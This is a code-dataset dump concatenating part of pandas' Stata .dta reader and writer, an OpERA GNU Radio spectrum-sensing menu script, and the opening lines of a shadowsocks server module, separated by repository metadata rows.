dtype = [] # Convert struct data types to numpy data type
for i, typ in enumerate(self.typlist):
if typ in self.NUMPY_TYPE_MAP:
dtype.append(('s' + str(i), self.byteorder +
self.NUMPY_TYPE_MAP[typ]))
else:
dtype.append(('s' + str(i), 'S' + str(typ)))
dtype = np.dtype(dtype)
self._dtype = dtype
# Read data
dtype = self._dtype
max_read_len = (self.nobs - self._lines_read) * dtype.itemsize
read_len = nrows * dtype.itemsize
read_len = min(read_len, max_read_len)
if read_len <= 0:
# Iterator has finished, should never be here unless
# we are reading the file incrementally
if convert_categoricals:
self._read_value_labels()
self.close()
raise StopIteration
offset = self._lines_read * dtype.itemsize
self.path_or_buf.seek(self.data_location + offset)
read_lines = min(nrows, self.nobs - self._lines_read)
data = np.frombuffer(self.path_or_buf.read(read_len), dtype=dtype,
count=read_lines)
self._lines_read += read_lines
if self._lines_read == self.nobs:
self._can_read_value_labels = True
self._data_read = True
# if necessary, swap the byte order to native here
if self.byteorder != self._native_byteorder:
data = data.byteswap().newbyteorder()
if convert_categoricals:
self._read_value_labels()
if len(data) == 0:
data = DataFrame(columns=self.varlist, index=index)
else:
data = DataFrame.from_records(data, index=index)
data.columns = self.varlist
# If index is not specified, use actual row number rather than
# restarting at 0 for each chunk.
if index is None:
ix = np.arange(self._lines_read - read_lines, self._lines_read)
data = data.set_index(ix)
if columns is not None:
try:
data = self._do_select_columns(data, columns)
except ValueError:
self.close()
raise
# Decode strings
for col, typ in zip(data, self.typlist):
if type(typ) is int:
data[col] = data[col].apply(
self._null_terminate, convert_dtype=True)
data = self._insert_strls(data)
cols_ = np.where(self.dtyplist)[0]
# Convert columns (if needed) to match input type
index = data.index
requires_type_conversion = False
data_formatted = []
for i in cols_:
if self.dtyplist[i] is not None:
col = data.columns[i]
dtype = data[col].dtype
if dtype != np.dtype(object) and dtype != self.dtyplist[i]:
requires_type_conversion = True
data_formatted.append(
(col, Series(data[col], index, self.dtyplist[i])))
else:
data_formatted.append((col, data[col]))
if requires_type_conversion:
data = DataFrame.from_items(data_formatted)
del data_formatted
self._do_convert_missing(data, convert_missing)
if convert_dates:
cols = np.where(lmap(lambda x: x in _date_formats,
self.fmtlist))[0]
for i in cols:
col = data.columns[i]
try:
data[col] = _stata_elapsed_date_to_datetime_vec(
data[col],
self.fmtlist[i])
except ValueError:
self.close()
raise
if convert_categoricals and self.format_version > 108:
data = self._do_convert_categoricals(data,
self.value_label_dict,
self.lbllist,
order_categoricals)
if not preserve_dtypes:
retyped_data = []
convert = False
for col in data:
dtype = data[col].dtype
if dtype in (np.float16, np.float32):
dtype = np.float64
convert = True
elif dtype in (np.int8, np.int16, np.int32):
dtype = np.int64
convert = True
retyped_data.append((col, data[col].astype(dtype)))
if convert:
data = DataFrame.from_items(retyped_data)
return data
def _do_convert_missing(self, data, convert_missing):
# Check for missing values, and replace if found
for i, colname in enumerate(data):
fmt = self.typlist[i]
if fmt not in self.VALID_RANGE:
continue
nmin, nmax = self.VALID_RANGE[fmt]
series = data[colname]
missing = np.logical_or(series < nmin, series > nmax)
if not missing.any():
continue
if convert_missing: # Replacement follows Stata notation
missing_loc = np.argwhere(missing)
umissing, umissing_loc = np.unique(series[missing],
return_inverse=True)
replacement = Series(series, dtype=np.object)
for j, um in enumerate(umissing):
missing_value = StataMissingValue(um)
loc = missing_loc[umissing_loc == j]
replacement.iloc[loc] = missing_value
else: # All replacements are identical
dtype = series.dtype
if dtype not in (np.float32, np.float64):
dtype = np.float64
replacement = Series(series, dtype=dtype)
replacement[missing] = np.nan
data[colname] = replacement
def _insert_strls(self, data):
if not hasattr(self, 'GSO') or len(self.GSO) == 0:
return data
for i, typ in enumerate(self.typlist):
if typ != 'Q':
continue
data.iloc[:, i] = [self.GSO[k] for k in data.iloc[:, i]]
return data
def _do_select_columns(self, data, columns):
if not self._column_selector_set:
column_set = set(columns)
if len(column_set) != len(columns):
raise ValueError('columns contains duplicate entries')
unmatched = column_set.difference(data.columns)
if unmatched:
raise ValueError('The following columns were not found in the '
'Stata data set: ' +
', '.join(list(unmatched)))
# Copy information for retained columns for later processing
dtyplist = []
typlist = []
fmtlist = []
lbllist = []
for col in columns:
i = data.columns.get_loc(col)
dtyplist.append(self.dtyplist[i])
typlist.append(self.typlist[i])
fmtlist.append(self.fmtlist[i])
lbllist.append(self.lbllist[i])
self.dtyplist = dtyplist
self.typlist = typlist
self.fmtlist = fmtlist
self.lbllist = lbllist
self._column_selector_set = True
return data[columns]
def _do_convert_categoricals(self, data, value_label_dict, lbllist,
order_categoricals):
"""
Converts categorical columns to Categorical type.
"""
value_labels = list(compat.iterkeys(value_label_dict))
cat_converted_data = []
for col, label in zip(data, lbllist):
if label in value_labels:
# Explicit call with ordered=True
cat_data = Categorical(data[col], ordered=order_categoricals)
categories = []
for category in cat_data.categories:
if category in value_label_dict[label]:
categories.append(value_label_dict[label][category])
else:
categories.append(category) # Partially labeled
try:
cat_data.categories = categories
except ValueError:
vc = Series(categories).value_counts()
repeats = list(vc.index[vc > 1])
repeats = '\n' + '-' * 80 + '\n'.join(repeats)
msg = 'Value labels for column {0} are not unique. The ' \
'repeated labels are:\n{1}'.format(col, repeats)
raise ValueError(msg)
# TODO: is the next line needed above in the data(...) method?
cat_data = Series(cat_data, index=data.index)
cat_converted_data.append((col, cat_data))
else:
cat_converted_data.append((col, data[col]))
data = DataFrame.from_items(cat_converted_data)
return data
def data_label(self):
"""Returns data label of Stata file"""
return self.data_label
def variable_labels(self):
"""Returns variable labels as a dict, associating each variable name
with corresponding label
"""
return dict(zip(self.varlist, self._variable_labels))
def value_labels(self):
"""Returns a dict, associating each variable name a dict, associating
each value its corresponding label
"""
if not self._value_labels_read:
self._read_value_labels()
return self.value_label_dict
def _open_file_binary_write(fname, encoding):
if hasattr(fname, 'write'):
# if 'b' not in fname.mode:
return fname
return open(fname, "wb")
def _set_endianness(endianness):
if endianness.lower() in ["<", "little"]:
return "<"
elif endianness.lower() in [">", "big"]:
return ">"
else: # pragma : no cover
raise ValueError("Endianness %s not understood" % endianness)
def _pad_bytes(name, length):
"""
Takes a char string and pads it with null bytes until it's length chars
"""
return name + "\x00" * (length - len(name))
def _convert_datetime_to_stata_type(fmt):
"""
Converts from one of the stata date formats to a type in TYPE_MAP
"""
if fmt in ["tc", "%tc", "td", "%td", "tw", "%tw", "tm", "%tm", "tq",
"%tq", "th", "%th", "ty", "%ty"]:
return np.float64 # Stata expects doubles for SIFs
else:
raise NotImplementedError("Format %s not implemented" % fmt)
def _maybe_convert_to_int_keys(convert_dates, varlist):
new_dict = {}
for key in convert_dates:
if not convert_dates[key].startswith("%"): # make sure proper fmts
convert_dates[key] = "%" + convert_dates[key]
if key in varlist:
new_dict.update({varlist.index(key): convert_dates[key]})
else:
if not isinstance(key, int):
raise ValueError("convert_dates key must be a "
"column or an integer")
new_dict.update({key: convert_dates[key]})
return new_dict
def _dtype_to_stata_type(dtype, column):
"""
Converts dtype types to stata types. Returns the byte of the given ordinal.
See TYPE_MAP and comments for an explanation. This is also explained in
the dta spec.
1 - 244 are strings of this length
Pandas Stata
251 - chr(251) - for int8 byte
252 - chr(252) - for int16 int
253 - chr(253) - for int32 long
254 - chr(254) - for float32 float
255 - chr(255) - for double double
If there are dates to convert, then dtype will already have the correct
type inserted.
"""
# TODO: expand to handle datetime to integer conversion
if dtype.type == np.string_:
return chr(dtype.itemsize)
elif dtype.type == np.object_: # try to coerce it to the biggest string
# not memory efficient, what else could we
# do?
itemsize = max_len_string_array(_ensure_object(column.values))
return chr(max(itemsize, 1))
elif dtype == np.float64:
return chr(255)
elif dtype == np.float32:
return chr(254)
elif dtype == np.int32:
return chr(253)
elif dtype == np.int16:
return chr(252)
elif dtype == np.int8:
return chr(251)
else: # pragma : no cover
raise NotImplementedError("Data type %s not supported." % dtype)
def _dtype_to_default_stata_fmt(dtype, column):
"""
Maps numpy dtype to stata's default format for this type. Not terribly
important since users can change this in Stata. Semantics are
object -> "%DDs" where DD is the length of the string. If not a string,
raise ValueError
float64 -> "%10.0g"
float32 -> "%9.0g"
int64 -> "%9.0g"
int32 -> "%12.0g"
int16 -> "%8.0g"
int8 -> "%8.0g"
"""
# TODO: Refactor to combine type with format
# TODO: expand this to handle a default datetime format?
if dtype.type == np.object_:
inferred_dtype = infer_dtype(column.dropna())
if not (inferred_dtype in ('string', 'unicode') or
len(column) == 0):
raise ValueError('Writing general object arrays is not supported')
itemsize = max_len_string_array(_ensure_object(column.values))
if itemsize > 244:
raise ValueError(excessive_string_length_error % column.name)
return "%" + str(max(itemsize, 1)) + "s"
elif dtype == np.float64:
return "%10.0g"
elif dtype == np.float32:
return "%9.0g"
elif dtype == np.int32:
return "%12.0g"
elif dtype == np.int8 or dtype == np.int16:
return "%8.0g"
else: # pragma : no cover
raise NotImplementedError("Data type %s not supported." % dtype)
class StataWriter(StataParser):
"""
A class for writing Stata binary dta files
Parameters
----------
fname : str or buffer
String path of file-like object
data : DataFrame
Input to save
convert_dates : dict
Dictionary mapping columns containing datetime types to stata internal
format to use when wirting the dates. Options are 'tc', 'td', 'tm',
'tw', 'th', 'tq', 'ty'. Column can be either an integer or a name.
Datetime columns that do not have a conversion type specified will be
converted to 'tc'. Raises NotImplementedError if a datetime column has
timezone information
write_index : bool
Write the index to Stata dataset.
encoding : str
Default is latin-1. Unicode is not supported
byteorder : str
Can be ">", "<", "little", or "big". default is `sys.byteorder`
time_stamp : datetime
A datetime to use as file creation date. Default is the current time
dataset_label : str
A label for the data set. Must be 80 characters or smaller.
variable_labels : dict
Dictionary containing columns as keys and variable labels as values.
Each label must be 80 characters or smaller.
.. versionadded:: 0.19.0
Returns
-------
writer : StataWriter instance
The StataWriter instance has a write_file method, which will
write the file to the given `fname`.
Raises
------
NotImplementedError
* If datetimes contain timezone information
ValueError
* Columns listed in convert_dates are noth either datetime64[ns]
or datetime.datetime
* Column dtype is not representable in Stata
* Column listed in convert_dates is not in DataFrame
* Categorical label contains more than 32,000 characters
Examples
--------
>>> import pandas as pd
>>> data = pd.DataFrame([[1.0, 1]], columns=['a', 'b'])
>>> writer = StataWriter('./data_file.dta', data)
>>> writer.write_file()
Or with dates
>>> from datetime import datetime
>>> data = pd.DataFrame([[datetime(2000,1,1)]], columns=['date'])
>>> writer = StataWriter('./date_data_file.dta', data, {'date' : 'tw'})
>>> writer.write_file()
"""
def __init__(self, fname, data, convert_dates=None, write_index=True,
encoding="latin-1", byteorder=None, time_stamp=None,
data_label=None, variable_labels=None):
super(StataWriter, self).__init__(encoding)
self._convert_dates = {} if convert_dates is None else convert_dates
self._write_index = write_index
self._time_stamp = time_stamp
self._data_label = data_label
self._variable_labels = variable_labels
# attach nobs, nvars, data, varlist, typlist
self._prepare_pandas(data)
if byteorder is None:
byteorder = sys.byteorder
self._byteorder = _set_endianness(byteorder)
self._fname = fname
self.type_converters = {253: np.int32, 252: np.int16, 251: np.int8}
def _write(self, to_write):
"""
Helper to call encode before writing to file for Python 3 compat.
"""
if compat.PY3:
self._file.write(to_write.encode(self._encoding or
self._default_encoding))
else:
self._file.write(to_write)
def _prepare_categoricals(self, data):
"""Check for categorical columns, retain categorical information for
Stata file and convert categorical data to int"""
is_cat = [is_categorical_dtype(data[col]) for col in data]
self._is_col_cat = is_cat
self._value_labels = []
if not any(is_cat):
return data
get_base_missing_value = StataMissingValue.get_base_missing_value
index = data.index
data_formatted = []
for col, col_is_cat in zip(data, is_cat):
if col_is_cat:
self._value_labels.append(StataValueLabel(data[col]))
dtype = data[col].cat.codes.dtype
if dtype == np.int64:
raise ValueError('It is not possible to export '
'int64-based categorical data to Stata.')
values = data[col].cat.codes.values.copy()
# Upcast if needed so that correct missing values can be set
if values.max() >= get_base_missing_value(dtype):
if dtype == np.int8:
dtype = np.int16
elif dtype == np.int16:
dtype = np.int32
else:
dtype = np.float64
values = np.array(values, dtype=dtype)
# Replace missing values with Stata missing value for type
values[values == -1] = get_base_missing_value(dtype)
data_formatted.append((col, values, index))
else:
data_formatted.append((col, data[col]))
return DataFrame.from_items(data_formatted)
def _replace_nans(self, data):
# return data
"""Checks floating point data columns for nans, and replaces these with
the generic Stata for missing value (.)"""
for c in data:
dtype = data[c].dtype
if dtype in (np.float32, np.float64):
if dtype == np.float32:
replacement = self.MISSING_VALUES['f']
else:
replacement = self.MISSING_VALUES['d']
data[c] = data[c].fillna(replacement)
return data
def _check_column_names(self, data):
"""
Checks column names to ensure that they are valid Stata column names.
This includes checks for:
* Non-string names
* Stata keywords
* Variables that start with numbers
* Variables with names that are too long
When an illegal variable name is detected, it is converted, and if
dates are exported, the variable name is propagated to the date
conversion dictionary
"""
converted_names = []
columns = list(data.columns)
original_columns = columns[:]
duplicate_var_id = 0
for j, name in enumerate(columns):
orig_name = name
if not isinstance(name, string_types):
name = text_type(name)
for c in name:
if (c < 'A' or c > 'Z') and (c < 'a' or c > 'z') and \
(c < '0' or c > '9') and c != '_':
name = name.replace(c, '_')
# Variable name must not be a reserved word
if name in self.RESERVED_WORDS:
name = '_' + name
# Variable name may not start with a number
if name[0] >= '0' and name[0] <= '9':
name = '_' + name
name = name[:min(len(name), 32)]
if not name == orig_name:
# check for duplicates
while columns.count(name) > 0:
# prepend ascending number to avoid duplicates
name = '_' + str(duplicate_var_id) + name
name = name[:min(len(name), 32)]
duplicate_var_id += 1
# need to possibly encode the orig name if its unicode
try:
orig_name = orig_name.encode('utf-8')
except:
pass
converted_names.append(
'{0} -> {1}'.format(orig_name, name))
columns[j] = name
data.columns = columns
# Check date conversion, and fix key if needed
if self._convert_dates:
for c, o in zip(columns, original_columns):
if c != o:
self._convert_dates[c] = self._convert_dates[o]
del self._convert_dates[o]
if converted_names:
import warnings
ws = invalid_name_doc.format('\n '.join(converted_names))
warnings.warn(ws, InvalidColumnName)
return data
def _prepare_pandas(self, data):
# NOTE: we might need a different API / class for pandas objects so
# we can set different semantics - handle this with a PR to pandas.io
data = data.copy()
if self._write_index:
data = data.reset_index()
# Ensure column names are strings
data = self._check_column_names(data)
# Check columns for compatibility with stata, upcast if necessary
# Raise if outside the supported range
data = _cast_to_stata_types(data)
# Replace NaNs with Stata missing values
data = self._replace_nans(data)
# Convert categoricals to int data, and strip labels
data = self._prepare_categoricals(data)
self.nobs, self.nvar = data.shape
self.data = data
self.varlist = data.columns.tolist()
dtypes = data.dtypes
# Ensure all date columns are converted
for col in data:
if col in self._convert_dates:
continue
if is_datetime64_dtype(data[col]):
self._convert_dates[col] = 'tc'
self._convert_dates = _maybe_convert_to_int_keys(self._convert_dates,
self.varlist)
for key in self._convert_dates:
new_type = _convert_datetime_to_stata_type(
self._convert_dates[key]
)
dtypes[key] = np.dtype(new_type)
self.typlist = []
self.fmtlist = []
for col, dtype in dtypes.iteritems():
self.fmtlist.append(_dtype_to_default_stata_fmt(dtype, data[col]))
self.typlist.append(_dtype_to_stata_type(dtype, data[col]))
# set the given format for the datetime cols
if self._convert_dates is not None:
for key in self._convert_dates:
self.fmtlist[key] = self._convert_dates[key]
def write_file(self):
self._file = _open_file_binary_write(
self._fname, self._encoding or self._default_encoding
)
try:
self._write_header(time_stamp=self._time_stamp,
data_label=self._data_label)
self._write_descriptors()
self._write_variable_labels()
# write 5 zeros for expansion fields
self._write(_pad_bytes("", 5))
self._prepare_data()
self._write_data()
self._write_value_labels()
finally:
self._file.close()
def _write_value_labels(self):
for vl in self._value_labels:
self._file.write(vl.generate_value_label(self._byteorder,
self._encoding))
def _write_header(self, data_label=None, time_stamp=None):
byteorder = self._byteorder
# ds_format - just use 114
self._file.write(struct.pack("b", 114))
# byteorder
self._write(byteorder == ">" and "\x01" or "\x02")
# filetype
self._write("\x01")
# unused
self._write("\x00")
# number of vars, 2 bytes
self._file.write(struct.pack(byteorder + "h", self.nvar)[:2])
# number of obs, 4 bytes
self._file.write(struct.pack(byteorder + "i", self.nobs)[:4])
# data label 81 bytes, char, null terminated
if data_label is None:
self._file.write(self._null_terminate(_pad_bytes("", 80)))
else:
self._file.write(
self._null_terminate(_pad_bytes(data_label[:80], 80))
)
# time stamp, 18 bytes, char, null terminated
# format dd Mon yyyy hh:mm
if time_stamp is None:
time_stamp = datetime.datetime.now()
elif not isinstance(time_stamp, datetime.datetime):
raise ValueError("time_stamp should be datetime type")
self._file.write(
self._null_terminate(time_stamp.strftime("%d %b %Y %H:%M"))
)
def _write_descriptors(self, typlist=None, varlist=None, srtlist=None,
fmtlist=None, lbllist=None):
nvar = self.nvar
# typlist, length nvar, format byte array
for typ in self.typlist:
self._write(typ)
# varlist names are checked by _check_column_names
# varlist, requires null terminated
for name in self.varlist:
name = self._null_terminate(name, True)
name = _pad_bytes(name[:32], 33)
self._write(name)
# srtlist, 2*(nvar+1), int array, encoded by byteorder
srtlist = _pad_bytes("", 2 * (nvar + 1))
self._write(srtlist)
# fmtlist, 49*nvar, char array
for fmt in self.fmtlist:
self._write(_pad_bytes(fmt, 49))
# lbllist, 33*nvar, char array
for i in range(nvar):
# Use variable name when categorical
if self._is_col_cat[i]:
name = self.varlist[i]
name = self._null_terminate(name, True)
name = _pad_bytes(name[:32], 33)
self._write(name)
else: # Default is empty label
self._write(_pad_bytes("", 33))
def _write_variable_labels(self):
# Missing labels are 80 blank characters plus null termination
blank = _pad_bytes('', 81)
if self._variable_labels is None:
for i in range(self.nvar):
self._write(blank)
return
for col in self.data:
if col in self._variable_labels:
label = self._variable_labels[col]
if len(label) > 80:
raise ValueError('Variable labels must be 80 characters '
'or fewer')
is_latin1 = all(ord(c) < 256 for c in label)
if not is_latin1:
raise ValueError('Variable labels must contain only '
'characters that can be encoded in '
'Latin-1')
self._write(_pad_bytes(label, 81))
else:
self._write(blank)
def _prepare_data(self):
data = self.data
typlist = self.typlist
convert_dates = self._convert_dates
# 1. Convert dates
if self._convert_dates is not None:
for i, col in enumerate(data):
if i in convert_dates:
data[col] = _datetime_to_stata_elapsed_vec(data[col],
self.fmtlist[i])
# 2. Convert bad string data to '' and pad to correct length
dtype = []
data_cols = []
has_strings = False
for i, col in enumerate(data):
typ = ord(typlist[i])
if typ <= 244:
has_strings = True
data[col] = data[col].fillna('').apply(_pad_bytes, args=(typ,))
stype = 'S%d' % typ
dtype.append(('c' + str(i), stype))
string = data[col].str.encode(self._encoding)
data_cols.append(string.values.astype(stype))
else:
dtype.append(('c' + str(i), data[col].dtype))
data_cols.append(data[col].values)
dtype = np.dtype(dtype)
if has_strings:
self.data = np.fromiter(zip(*data_cols), dtype=dtype)
else:
self.data = data.to_records(index=False)
def _write_data(self):
data = self.data
data.tofile(self._file)
def _null_terminate(self, s, as_string=False):
null_byte = '\x00'
if compat.PY3 and not as_string:
s += null_byte
return s.encode(self._encoding)
else:
s += null_byte
return s
| gpl-3.0 | -911,198,936,538,238,300 | 35.574901 | 90 | 0.544443 | false | 3.938943 | false | false | false |
ComputerNetworks-UFRGS/OpERA | python/app/simpleSS.py | 1 | 15314 | #!/usr/bin/env python
"""
Copyright 2013 OpERA
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
import sys
path = os.path.abspath(os.path.join(os.path.dirname(__file__), "../"))
sys.path.insert(0, path)
from gnuradio import gr
from gnuradio import blocks
from gnuradio.eng_option import eng_option
from optparse import OptionParser
from struct import *
from threading import Thread
import time
import random
import numpy as np
from abc import ABCMeta, abstractmethod
#Project imports:
from OpERAFlow import OpERAFlow
from device import *
from sensing import EnergyDecision
from sensing import EnergySSArch, EnergyCalculator
from packet import PacketGMSKRx, PacketOFDMRx, PacketGMSKTx, PacketOFDMTx, SimpleTx
from utils import Channel, Logger, ChannelModeler
# Try to import easygui.
#try:
# import easygui
# easygui_import = True
#
#except ImportError:
easygui_import = False
# Constants used in the program:
# ranges:
MIN_FREQ = 100e6
MAX_FREQ = 2.2e9
MIN_GAIN = 0
MAX_GAIN = 30
# options
STR_FREQ = "Frequency"
STR_GAIN = "Gain multiplier"
#questions
QUESTION_SET_FREQ = "Enter a frequency value. Should be in range"
QUESTION_SET_GAIN = "Enter the gain multiplier. Should be in range"
# menu (operations)
NEW_FREQ = "Set a new frequency"
GAIN_MULTIPLIER = "Set a new gain multiplier"
QUIT = "Quit"
# integers representing the operations
OPT_SET_FREQ = 1
OPT_SET_GAIN = 2
OPT_QUIT = 3
# others
MIN_OPT = 1
MAX_OPT = 3
YES = 1
NO = 0
ENTER = "enter"
RAW_ENTER = ""
def clear_screen():
"""
Check the os and use an apropriate function to clear the screen
"""
# Clear Windows command prompt.
if (os.name in ('ce', 'nt', 'dos')):
os.system('cls')
# Clear the Linux terminal.
elif ('posix' in os.name):
os.system('clear')
class OpERAUtils(object):
"""
Class with useful methods from OpERA
"""
def __init__(self):
"""
CTOR
"""
pass
@staticmethod
def device_definition():
"""
Definition of the devices used in the program.
"""
tb = OpERAFlow(name='US')
uhd_source = UHDSource()
uhd_source.samp_rate = 195512
energy = EnergySSArch(fft_size=512, mavg_size=5, algorithm=EnergyDecision(th=0))
radio = RadioDevice(name="radio")
radio.add_arch(source=uhd_source, arch=energy, sink=blocks.probe_signal_f(), uhd_device=uhd_source, name='ss')
tb.add_radio(radio, "radio")
return tb, radio
@staticmethod
def add_print_list():
"""
Adds to the print list (method of the Logger class)
"""
print "\n******************************************************************\n"
print "\nPrinting the energy\n"
Logger.add_to_print_list("energy_decision", "energy")
print "\n******************************************************************\n"
@staticmethod
def printing_energy():
"""
Prints the energy until the ENTER key is pressed.
"""
clear_screen()
key = None
time.sleep(0.1)
Logger._enable = True
# Press enter to exit (stop the printing).
while key is not ENTER:
OpERAUtils.add_print_list()
key = raw_input()
# If "enter" key was pressed, exit the loop:
if RAW_ENTER in key:
key = ENTER
Logger._enable = False
Logger.remove_from_print_list("energy_decision", "energy")
class AbstractMenu(object):
"""
Abstract class for the menus.
"""
__metaclass__ = ABCMeta
def __init__(self):
"""
CTOR
"""
pass
def get_value_in_range(self, min_value, max_value, question, option):
"""
Reads a value (from the user) and check if it is in range (ie, min_value >= value <= max_value).
@param min_value Mininum value of the range (float number)
@param max_value Maximum value of the range (float number)
@param question Question asked (string type)
@param option (string type)
@return float_value
@return no_value Indicates if the value returned is valid (no_value = False) or if the user has
cancelled the operation (no_value = True).
"""
# Check if the chosen option is "Set Frequency" or "Set Gain Multiplier", in order
# to use the most appropriate string formatting.
if option is STR_GAIN:
mens = "%s (%.2f, %.2f)." % (question, min_value, max_value)
elif option is STR_FREQ:
mens = "%s (%.2e, %.2e)." % (question, min_value, max_value)
value = ""
float_value = False
value_ok = False
no_value = False
while value_ok is False and no_value is False:
value = self._get_value(mens)
# If it is a valid input.
if value is not None:
try:
float_value = float(value)
# If the value is a float number but it's not in range, shows an error message
if float_value < min_value or float_value > max_value:
if option is STR_GAIN:
range_error = "%s should be in range (%.2f, %.2f)." % (option, min_value, max_value)
elif option is STR_FREQ:
range_error = "%s should be in range (%.2e, %.2e)." % (option, min_value, max_value)
self._show_error_msg(range_error)
# If the value if a float number and it's in range, so the input is valid. Exits the loop.
else:
value_ok = True
# If the input is not a float number, shows an error message.
except ValueError:
type_error = "%s should be a float number." % (option)
self._show_error_msg(type_error)
# If the user has cancelled the operation.
elif value is None:
# Check if the user wants to quit.
choices = ["Yes", "No"]
msg = "Quit the %s setter? " % (option.lower())
reply = self._choose_option(msg, choices)
if reply is "Yes":
no_value = True
# Returns the value (casted to float) and a boolean that indicates if the value returned
# is valid or not(in case of cancelled operation).
return float_value, no_value
@abstractmethod
def _show_error_msg(self, msg):
"""
Shows an error message with the appropriate GUI.
@param msg Error message.
"""
pass
@abstractmethod
def _choose_option(self, msg, choices):
"""
Let the user choose an option and return the integer that represents it.
@param msg Instruction message
@param choices List of choices
"""
pass
@abstractmethod
def _get_value(self, msg):
"""
Returns the read value
@param msg The message to instruct the user.
"""
pass
class Menu(AbstractMenu):
"""
Class that manages the GUIs.
"""
def __init__(self):
"""
CTOR
"""
AbstractMenu.__init__(self)
# If the import was successful, uses Easygui as GUI.
if easygui_import is True:
self._menu = EasyguiMenu()
# If it isn't, uses the Console.
else:
self._menu = ConsoleMenu()
def get_value_in_range(self, min_value, max_value, question, option):
"""
@param min_value Mininum value of the range (float number)
@param max_value Maximum value of the range (float number)
@param question Question asked (string type)
@param option (string type --> or constant??)
"""
return self._menu.get_value_in_range(min_value, max_value, question, option)
def main_menu(self):
"""
Shows the main menu.
"""
self._menu._main_menu()
def _show_error_msg(self, msg):
"""
Shows the message.
@param msg The message to show.
"""
self._menu._show_error_msg(msg)
def _choose_option(self, msg, choices):
"""
Let the user choose an option from a list of them.
@param msg Instruction message
@param choices A list of choices.
"""
return self._menu._choose_option(msg, choices)
def _get_value(self, msg):
"""
Gets an input from the user.
@param msg Instruction message.
"""
self._menu._get_value(msg)
def _show_menu(self, str_list):
"""
Shows a menu with options and let the user choose one of them.
@param str_list A list with the options of the menu (strings).
"""
return self._menu._show_menu(str_list)
class EasyguiMenu(AbstractMenu):
"""
Class for the menu (shown with easygui).
"""
def __init__(self):
"""
CTOR
"""
AbstractMenu.__init__(self)
def _show_error_msg(self, msg):
"""
Easygui implementation of showing a message.
@param msg Message to show.
"""
easygui.msgbox(msg)
def _choose_option(self, msg, choices):
"""
Easygui implementation of letting the user choose an option.
@param msg Instruction message.
@param choices A list of choices.
"""
reply = easygui.buttonbox(msg, choices=choices)
if reply is "Yes":
return YES
elif reply is "No":
return NO
def _get_value(self, msg):
"""
Easygui implementation of letting the user enter a value.
@param msg Instruction message
"""
value = easygui.enterbox(msg)
return value
def _show_menu(self, str_list):
"""
Easygui implementation of showing a menu and allowing the user to choose
one of its options.
@param str_list A list with the menu options.
"""
choices = str_list
msg = "Choose one option: "
reply = easygui.buttonbox(msg, choices=choices)
if reply is NEW_FREQ:
int_reply = 1
elif reply is GAIN_MULTIPLIER:
int_reply = 2
elif reply is QUIT:
int_reply = 3
return int_reply
class ConsoleMenu(AbstractMenu):
"""
Class for the menu (shown in console)
"""
def __init__(self):
"""
CTOR
"""
AbstractMenu.__init__(self)
def _show_error_msg(self, msg):
"""
Console implementation of showing a message
@param msg Message to show.
"""
print msg
def _choose_option(self, msg, choices):
"""
Console implementation of letting the user choose an option.
@param msg Instruction message
@param choices A list of choices.
"""
reply_ok = False
while reply_ok is False:
print msg
for num, opt in enumerate(choices):
print "%i: %s" % (num, opt)
reply = raw_input("\nChoose one option: ")
try:
int_reply = int(reply)
if int_reply is 0:
reply_ok = True
return int_reply
elif int_reply is 1:
reply_ok = True
return int_reply
else:
print "\nReply should be 0 (Yes) or 1 (No)."
except ValueError:
print "\nReply should be an integer."
def _get_value(self, msg):
"""
Console implementation of letting the user enter a value.
@param msg Instruction message.
"""
str_value = raw_input("\n" + msg)
return str_value
def _show_menu(self, str_list):
"""
Console implementation of showing a menu and letting the user choose
one of its options.
@param str_list A list with the menu options.
"""
print "*****************************************************************\n"
for num, opt in enumerate(str_list):
print "%i. %s" % (num, opt)
print "*****************************************************************\n\n"
input_ok = False
while input_ok is False:
choice = raw_input("Choose one option: ")
if choice.isdigit() is True:
int_choice = int(choice)
if int_choice < MIN_OPT or int_choice > MAX_OPT:
print "\n\nChosen operation is invalid.\n"
else:
input_ok = True
else:
print "\n\nEnter a number that corresponds to a valid operation.\n"
return int_choice
def main(tb, radio):
"""
Main function
@param tb The topblock.
@param radio The radio device.
"""
# instance of Menu class
menu = Menu()
tb.start()
radio.set_center_freq(100e6)
continue_loop = True
no_freq = False
while continue_loop is True:
reply = menu._show_menu([NEW_FREQ, GAIN_MULTIPLIER, QUIT])
# Operation is quit.
if reply is OPT_QUIT:
choices = ["Yes", "No"]
msg = "Are you sure?"
reply_2 = menu._choose_option(msg, choices=choices)
# If the answer is YES, quit the program. Else, continues in the loop.
if reply_2 is YES:
tb.stop()
continue_loop = False
print "\n******************************************"
print "\tQuitting the program."
print "******************************************\n"
os._exit(1)
# Operation is "set a new frequency".
elif reply is OPT_SET_FREQ:
# gets the frequency
freq, no_freq = menu.get_value_in_range(MIN_FREQ, MAX_FREQ, QUESTION_SET_FREQ, STR_FREQ)
if no_freq is False:
radio.set_center_freq(freq)
# prints the energy
OpERAUtils.printing_energy()
# Operation is "set the gain multiplier".
elif reply is OPT_SET_GAIN:
# gets the gain
gain, no_gain = menu.get_value_in_range(MIN_GAIN, MAX_GAIN, QUESTION_SET_GAIN, STR_GAIN)
if no_gain is False:
radio.set_gain(gain)
OpERAUtils.printing_energy()
if __name__ == "__main__":
tb, radio = OpERAUtils.device_definition()
try:
main(tb, radio)
except KeyboardInterrupt:
tb.stop()
Logger.dump('./dump/', '', 0)
| apache-2.0 | -8,469,623,994,222,200,000 | 27.150735 | 118 | 0.547146 | false | 4.106731 | false | false | false |
tension/shadowsocks | server.py | 2 | 1689 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright 2015 breakwall
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import time
import sys
import threading
import os
if __name__ == '__main__':
import inspect
os.chdir(os.path.dirname(os.path.realpath(inspect.getfile(inspect.currentframe()))))
import server_pool
import db_transfer
from shadowsocks import shell
from configloader import load_config, get_config
class MainThread(threading.Thread):
def __init__(self, obj):
